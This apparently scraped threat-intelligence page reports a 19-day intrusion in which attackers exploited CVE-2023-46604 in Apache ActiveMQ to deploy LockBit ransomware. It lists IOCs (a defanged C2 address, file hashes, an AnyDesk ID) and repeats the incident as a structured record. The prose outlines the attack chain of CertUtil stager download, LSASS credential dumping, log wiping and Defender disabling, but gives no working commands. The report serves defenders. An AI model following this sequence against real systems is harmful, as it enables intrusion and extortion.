Critical Apache ActiveMQ Exploit Leads to LockBit Ransomware Attack in 19-Day Intrusion
A critical remote code execution vulnerability in Apache ActiveMQ (CVE-2023-46604, CVSS 10.0) was exploited by threat actors to deploy LockBit ransomware across an enterprise network, spanning 19 days from initial access to full encryption. The attack began in mid-February 2024, targeting a publicly exposed Windows server running the vulnerable messaging broker.
The intrusion started when attackers sent a malicious OpenWire command to the ActiveMQ server, forcing it to load a remote Java Spring XML configuration file. This triggered the download of a Metasploit stager via Windows CertUtil, establishing a command-and-control (C2) channel to 166.62.100[.]52. Within 40 minutes, the threat actors escalated to SYSTEM-level privileges, dumped credentials from LSASS process memory, and began lateral movement.
Though defenders evicted the attackers on the second day, the unpatched ActiveMQ server remained vulnerable. Eighteen days later, the same threat actors re-entered using the identical exploit, this time leveraging a stolen privileged service account obtained during the first intrusion. Upon return, they confirmed domain administrator access, deployed a disguised network scanner (Advanced IP Scanner masquerading as SoftPerfect Network Scanner), and moved LockBit ransomware executables (LB3.exe, LB3_pass.exe) via RDP sessions.
Ransomware execution varied by target file and backup servers received specific path and password arguments, while other hosts were infected via double-click execution. Ransom notes directed victims to Session private messaging, suggesting the attackers used the leaked LockBit Black builder rather than official LockBit infrastructure.
The total "Time to Ransomware" was 419 hours (19 days), though the second intrusion could have led to encryption in under 90 minutes if undetected. Attackers also wiped event logs, installed AnyDesk for persistence, and disabled Windows Defender using SystemSettingsAdminFlows.exe on an Exchange server.
Key Indicators of Compromise (IOCs):
- C2 Server:
166.62.100[.]52 - Ransomware Executables:
LB3.exe(8CEEE89550C521BA43F59D24BA53A22A3B69EAD0FCE118508D0A87A383D6A7B6)LB3_pass.exe(C8646CFB574FF2C6F183C3C3951BF6B2C6CF16FF8A5E949A118BE27F15962FAE)
- Disguised Tools:
netscan.exe(87BFB05057F215659CC801750118900145F8A22FA93AC4C6E1BFD81AA98B0A55)advanced_ip_scanner.exe(722FFF8F38197D1449DF500AE31A95BB34A6DDABA56834B13EAAFF2B0F9F1C8B)
- AnyDesk Client ID:
1148037084
The attack highlights the risks of unpatched critical vulnerabilities, credential theft via LSASS, and rapid lateral movement in ransomware operations.
Source: https://cybersecuritynews.com/threat-actors-exploit-apache-activemq-server-vulnerability/
Apache Software Foundation TPRM report: https://www.rankiteo.com/company/the-apache-software-foundation
"id": "the1772000706",
"linkid": "the-apache-software-foundation",
"type": "Vulnerability",
"date": "2/2024",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"{'affected_entities': [{'type': 'Enterprise'}],
'attack_vector': 'Remote Code Execution (RCE)',
'data_breach': {'data_encryption': True},
'date_detected': '2024-02-15',
'description': 'A critical remote code execution vulnerability in Apache '
'ActiveMQ (CVE-2023-46604, CVSS 10.0) was exploited by threat '
'actors to deploy LockBit ransomware across an enterprise '
'network, spanning 19 days from initial access to full '
'encryption. The attack began in mid-February 2024, targeting '
'a publicly exposed Windows server running the vulnerable '
'messaging broker.',
'impact': {'data_compromised': True,
'operational_impact': 'Full encryption of systems, wiped event '
'logs, disabled security tools',
'systems_affected': ['Windows servers',
'ActiveMQ servers',
'File servers',
'Backup servers']},
'initial_access_broker': {'backdoors_established': ['AnyDesk installation'],
'entry_point': 'Publicly exposed Windows server '
'running Apache ActiveMQ',
'high_value_targets': ['Domain administrator '
'access']},
'lessons_learned': 'Risks of unpatched critical vulnerabilities, credential '
'theft via LSASS, and rapid lateral movement in ransomware '
'operations.',
'motivation': 'Financial Gain',
'post_incident_analysis': {'corrective_actions': ['Patch management for '
'critical vulnerabilities',
'Restrict LSASS access',
'Rotate and monitor '
'privileged accounts',
'Implement EDR/XDR '
'solutions'],
'root_causes': ['Unpatched Apache ActiveMQ server '
'(CVE-2023-46604)',
'Credential theft via LSASS '
'dumping',
'Stolen privileged service account '
'reuse']},
'ransomware': {'data_encryption': True,
'ransomware_strain': 'LockBit (Black builder variant)'},
'recommendations': ['Patch critical vulnerabilities immediately',
'Monitor and restrict access to LSASS process memory',
'Implement network segmentation',
'Enhance monitoring for lateral movement',
'Disable or restrict RDP where not needed',
'Regularly audit privileged service accounts'],
'references': [{'source': 'Cyber Incident Description'}],
'response': {'containment_measures': 'Evicted attackers on the second day'},
'threat_actor': 'LockBit Affiliate',
'title': 'Critical Apache ActiveMQ Exploit Leads to LockBit Ransomware Attack '
'in 19-Day Intrusion',
'type': 'Ransomware',
'vulnerability_exploited': 'CVE-2023-46604 (Apache ActiveMQ)'}